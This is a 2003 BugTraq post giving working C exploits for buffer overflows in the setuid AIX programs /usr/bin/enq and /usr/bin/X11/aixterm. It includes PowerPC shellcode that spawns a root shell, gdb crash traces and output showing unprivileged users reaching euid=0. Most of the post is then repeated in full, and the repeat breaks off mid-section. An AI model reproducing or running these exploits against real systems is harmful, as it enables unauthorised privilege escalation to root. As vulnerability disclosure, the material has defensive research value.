BugTraq
Back to list
|
Post reply
/usr/bin/enq and /usr/bin/X11/aixterm exploit in AIX
Feb 17 2003 07:00AM
choi sungwoon (monocat2 hanmail net)
(1 replies)
/*
Title: /usr/bin/enq and /usr/bin/X11/aixterm exploit in AIX
Vulnerability found by Esa Etelavoun, iDEFFENSE
Author: green(green (at) wowhacker (dot) org [email concealed]), dragory(dragory (at) wowhacker (dot) org [email concealed])
Tested on AIX 4.3.3/RS6000
Reference: lsd-pl.net's exploit
Thanks to wowcode & overhead team at Wowhacker(http://www.wowhacker.org)
*/
I tested BOF in AIX lately.
These are exploits of /usr/bin/enq and /usr/bin/X11/aixterm in AIX.
(My system language is Korean...)
1. /usr/bin/enq
/*
http://online.securityfocus.com/bid/2034
[green@aix test]$ /usr/bin/enq -M `perl -e 'print "a"x2000'`
enq: (경고): 0781-132 메세지 파일
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa을(를) 열 수 없습니다.
enq: errno = 86: 파일이나 경로 이름이 너무 깁니다.
Segmentation fault
[green@aix test]$ su -
root의 암호:
# gdb /usr/bin/enq
GNU gdb 5.0-aix51-020209
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "powerpc-ibm-aix4.3.3.0"...(no debugging
symbols found)...
(gdb) r -M `perl -e 'print "abcd"x700'`
Starting program: /usr/bin/enq -M `perl -e 'print "abcd"x700'`
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...enq: (경고): 0781-132 메세지 파일
abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
abc
dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
dab
cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
cda
bcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcda
bcd
abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
abc
dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
dab
cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
cda
bcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcda
bcd
abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
abc
dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
dab
cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
cda
bcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcda
bcd
abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
abc
dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
dab
cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
cda
bcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcda
bcd
abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
abc
dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
dab
cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
cda
bcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcda
bcd
abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
abc
dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
dab
cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
cda
bcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcda
bcd
abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
abc
dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
dab
cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
cda
bcenq: (경고): 0781-132 메세지 파일
abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
abc
dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
dab
cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
cda
bcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcda
bcd
abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
abc
dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
dab
cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
cda
bcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcda
bcd
abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
abc
dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
dab
cdabcdabcda
enq: errno = 86: 파일이나 경로 이름이 너무 깁니다.
Program received signal SIGSEGV, Segmentation fault.
0x62636460 in ?? () from (unknown load module)
(gdb) r -M `perl -e 'print "abcd"x5000'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /usr/bin/enq -M `perl -e 'print "abcd"x5000'`
Program received signal SIGSEGV, Segmentation fault.
0xd018a654 in getenv ()
(gdb) q
[green@aix test]$ id
uid=205(green) gid=1(staff)
[green@aix test]$ ./aix_enq
enq: (WARNING): Can't open message
file //////////////////////////////////////////////////enq: (WARNING):
Can't open message
file /////////////////////////////////////////////////////?
enq: errno = 86: File name too long
# id
uid=205(green) gid=1(staff) euid=0(root) egid=9(printq)
#
exploited by green.
*/
#define ADRNUM 3000
#define NOPNUM 16000
#define ADR_ALLIGN 0
#define ALLIGN 0
char setreuidcode[]=
"\x7e\x94\xa2\x79\x40\x82\xff\xfd\x7e\xa8\x02\xa6\x3a\xb5\x01\x40"
"\x88\x55\xfe\xe0\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\xc8\x03\xa6"
"\x4c\xc6\x33\x42\x44\xff\xff\x02\x92\x03\xff\xff\x38\x75\xff\x04"
"\x38\x95\xff\x0c\x7e\x85\xa3\x78\x90\x75\xff\x0c\x92\x95\xff\x10"
"\x88\x55\xfe\xe1\x9a\x95\xff\x0b\x4b\xff\xff\xd8/bin/sh";
char nop[]="\x7f\xff\xfb\x78";
main(int argc,char **argv,char **e){
char buffer[3000],egg[20000],adr[4],*b,*envp[2];
int i;
i=0; while(*e++) i+=strlen(*e)+1;
*((unsigned long*)adr)=(unsigned long)e+(i&~3)-8000;
envp[0]=egg;
envp[1]=0;
b=buffer;
for(i=0;i<ADR_ALLIGN;i++) *b++=adr[i%4];
for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
*b=0;
b=egg;
sprintf(b,"xxx=");b+=4;
for(i=0; i<ALLIGN;i++) *b++=' ';
for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
for(i=0;i<strlen(setreuidcode);i++) *b++=setreuidcode[i];
*b=0;
execle("/usr/bin/enq", "enq", "-M", buffer, 0, envp);
}
------------------------------------------------------------------------
---
--------------------------------
2. /usr/bin/X11/aixterm
/*
[dragory@aix dragory]$ cp /usr/bin/X11/aixterm ./test
[dragory@aix dragory]$ ./test -display x.x.x.x:0 -im `perl -
e 'print "x"x400'`
Segmentation fault (core dumped)
[dragory@aix dragory]$ gdb -q test core
(no debugging symbols found)...Core was generated by `test'.
Program terminated with signal 11, Segmentation fault.
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...#0
0x78787878 in ?? () from (unknown load module)
(gdb) q
[dragory@aix dragory]$ ./test -display x.x.x.x:0 -im a`perl -
e 'print "abcd"x100'`
[dragory@aix dragory]$ gdb -q test core
(no debugging symbols found)...Core was generated by `test'.
Program terminated with signal 11, Segmentation fault.
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...#0
0x63646160 in ?? () from (unknown load module)
(gdb) q
[dragory@aix dragory]$ ./test -display x.x.x.x:0 -im ab`perl -
e 'print "abcd"x100'`
[dragory@aix dragory]$ gdb -q test core
(no debugging symbols found)...Core was generated by `test'.
Program terminated with signal 11, Segmentation fault.
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...#0
0x62636460 in ?? () from (unknown load module)
(gdb) q
[dragory@aix dragory]$ ./test -display x.x.x.x:0 -im abc`perl -
e 'print "abcd"x100'`
[dragory@aix dragory]$ gdb -q test core
(no debugging symbols found)...Core was generated by `test'.
Program terminated with signal 11, Segmentation fault.
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...#0
0x61626364 in ?? () from (unknown load module)
(gdb) q
//ADR_ALLIGN = 3
[dragory@aix dragory]$ uname
AIX
[dragory@aix dragory]$ ls -l /usr/bin/X11/aixterm
-rwsr-xr-x 1 root system 376096 7월 20 1999 /usr/bin/X11/aixterm
[dragory@aix dragory]$ id
uid=218(dragory) gid=1(staff)
[dragory@aix dragory]$ gcc -o aixterm_exp aixterm_exp.c
[dragory@aix dragory]$ ./aixterm_exp -d X.X.X.X:0
# id
uid=218(dragory) gid=1(staff) euid=0(root)
#
The vulnerability was discovered by Euan Briggs.
exploited by dragory.
*/
//Original script is written by green
#include <stdio.h>
#include <unistd.h>
#define ADRNUM 1000
#define NOPNUM 16000
#define ADR_ALLIGN 3
#define ALLIGN 0
#define HOST_IP "1.1.1.1:0"
char setreuidcode[]=
"\x7e\x94\xa2\x79\x40\x82\xff\xfd\x7e\xa8\x02\xa6\x3a\xb5\x01\x40"
"\x88\x55\xfe\xe0\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\xc8\x03\xa6"
"\x4c\xc6\x33\x42\x44\xff\xff\x02\x92\x03\xff\xff\x38\x75\xff\x04"
"\x38\x95\xff\x0c\x7e\x85\xa3\x78\x90\x75\xff\x0c\x92\x95\xff\x10"
"\x88\x55\xfe\xe1\x9a\x95\xff\x0b\x4b\xff\xff\xd8/bin/sh";
//This shellcode is used in AIX 4.3.x
char nop[]="\x7f\xff\xfb\x78";
main(int argc,char **argv,char **e) {
char buffer[3000],egg[20000],adr[4],*b,*envp[2], host_ip[] = HOST_IP;
int i, opt, adr_allign = ADR_ALLIGN, allign = ALLIGN;
if(argc < 2)
{
usage(argv[0]);
exit(0);
}
while((opt = getopt(argc, argv, "d:a:A:")) != -1)
{
switch(opt)
{
case 'd':
strcpy(host_ip, optarg);
break;
case 'a':
adr_allign = atoi(optarg);
break;
case 'A':
allign = atoi(optarg);
break;
case '?':
usage(argv[0]);
exit(0);
}
}
i=0; while(*e++) i+=strlen(*e)+1;
*((unsigned long*)adr)=(unsigned long)e+(i&~3)-8000; //http://lsd-
pl.net
envp[0]=egg;
envp[1]=0;
b=buffer;
for(i=0;i<adr_allign;i++) *b++=adr[i%4];
for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
*b=0;
b=egg;
sprintf(b,"xxx=");b+=4;
for(i=0; i<allign;i++) *b++=' ';
for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
for(i=0;i<strlen(setreuidcode);i++) *b++=setreuidcode[i];
*b=0;
execle("/usr/bin/X11/aixterm", "aixterm", "-display", host_ip, "-im",
buffer, 0, envp);
}
usage(char *arg) {
printf("Usage : %s -d [Your X Server IP:0] -a [ADR_ALLIGN] -A [ALLIGN]
\n", arg);
printf("Default : [Your X Server IP:0]=1.1.1.1:0 ADR_ALLIGN=3 ALLIGN=0
\n");
printf("If not exploited, you may modify ALLIGN, Your X Server IP\n");
}
[ reply ]
Re: /usr/bin/enq and /usr/bin/X11/aixterm exploit in AIX
Feb 18 2003 11:23AM
Keith Stevenson (keith stevenson louisville edu)
Privacy Statement
Copyright 2010, SecurityFocus
/*
Title: /usr/bin/enq and /usr/bin/X11/aixterm exploit in AIX
Vulnerability found by Esa Etelavoun, iDEFFENSE
Author: green(green (at) wowhacker (dot) org [email concealed]), dragory(dragory (at) wowhacker (dot) org [email concealed])
Tested on AIX 4.3.3/RS6000
Reference: lsd-pl.net's exploit
Thanks to wowcode & overhead team at Wowhacker(http://www.wowhacker.org)
*/
I tested BOF in AIX lately.
These are exploits of /usr/bin/enq and /usr/bin/X11/aixterm in AIX.
(My system language is Korean...)
1. /usr/bin/enq
/*
http://online.securityfocus.com/bid/2034
[green@aix test]$ /usr/bin/enq -M `perl -e 'print "a"x2000'`
enq: (경고): 0781-132 메세지 파일
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa을(를) 열 수 없습니다.
enq: errno = 86: 파일이나 경로 이름이 너무 깁니다.
Segmentation fault
[green@aix test]$ su -
root의 암호:
# gdb /usr/bin/enq
GNU gdb 5.0-aix51-020209
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "powerpc-ibm-aix4.3.3.0"...(no debugging
symbols found)...
(gdb) r -M `perl -e 'print "abcd"x700'`
Starting program: /usr/bin/enq -M `perl -e 'print "abcd"x700'`
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...enq: (경고): 0781-132 메세지 파일
abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
abc
dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
dab
cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
cda
bcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcda
bcd
abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
abc
dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
dab
cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
cda
bcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcda
bcd
abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
abc
dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
dab
cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
cda
bcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcda
bcd
abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
abc
dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
dab
cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
cda
bcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcda
bcd
abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
abc
dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
dab
cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
cda
bcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcda
bcd
abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
abc
dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
dab
cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
cda
bcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcda
bcd
abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
abc
dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
dab
cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
cda
bcenq: (경고): 0781-132 메세지 파일
abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
abc
dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
dab
cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
cda
bcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcda
bcd
abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
abc
dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
dab
cdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdab
cda
bcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcda
bcd
abcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcd
abc
dabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabcdabc
dab
cdabcdabcda
enq: errno = 86: 파일이나 경로 이름이 너무 깁니다.
Program received signal SIGSEGV, Segmentation fault.
0x62636460 in ?? () from (unknown load module)
(gdb) r -M `perl -e 'print "abcd"x5000'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /usr/bin/enq -M `perl -e 'print "abcd"x5000'`
Program received signal SIGSEGV, Segmentation fault.
0xd018a654 in getenv ()
(gdb) q
[green@aix test]$ id
uid=205(green) gid=1(staff)
[green@aix test]$ ./aix_enq
enq: (WARNING): Can't open message
file //////////////////////////////////////////////////enq: (WARNING):
Can't open message
file /////////////////////////////////////////////////////?
enq: errno = 86: File name too long
# id
uid=205(green) gid=1(staff) euid=0(root) egid=9(printq)
#
exploited by green.
*/
#define ADRNUM 3000
#define NOPNUM 16000
#define ADR_ALLIGN 0
#define ALLIGN 0
char setreuidcode[]=
"\x7e\x94\xa2\x79\x40\x82\xff\xfd\x7e\xa8\x02\xa6\x3a\xb5\x01\x40"
"\x88\x55\xfe\xe0\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\xc8\x03\xa6"
"\x4c\xc6\x33\x42\x44\xff\xff\x02\x92\x03\xff\xff\x38\x75\xff\x04"
"\x38\x95\xff\x0c\x7e\x85\xa3\x78\x90\x75\xff\x0c\x92\x95\xff\x10"
"\x88\x55\xfe\xe1\x9a\x95\xff\x0b\x4b\xff\xff\xd8/bin/sh";
char nop[]="\x7f\xff\xfb\x78";
main(int argc,char **argv,char **e){
char buffer[3000],egg[20000],adr[4],*b,*envp[2];
int i;
i=0; while(*e++) i+=strlen(*e)+1;
*((unsigned long*)adr)=(unsigned long)e+(i&~3)-8000;
envp[0]=egg;
envp[1]=0;
b=buffer;
for(i=0;i<ADR_ALLIGN;i++) *b++=adr[i%4];
for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
*b=0;
b=egg;
sprintf(b,"xxx=");b+=4;
for(i=0; i<ALLIGN;i++) *b++=' ';
for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
for(i=0;i<strlen(setreuidcode);i++) *b++=setreuidcode[i];
*b=0;
execle("/usr/bin/enq", "enq", "-M", buffer, 0, envp);
}
------------------------------------------------------------------------
---
--------------------------------
2. /usr/bin/X11/aixterm
/*
[dragory@aix dragory]$ cp /usr/bin/X11/aixterm ./test
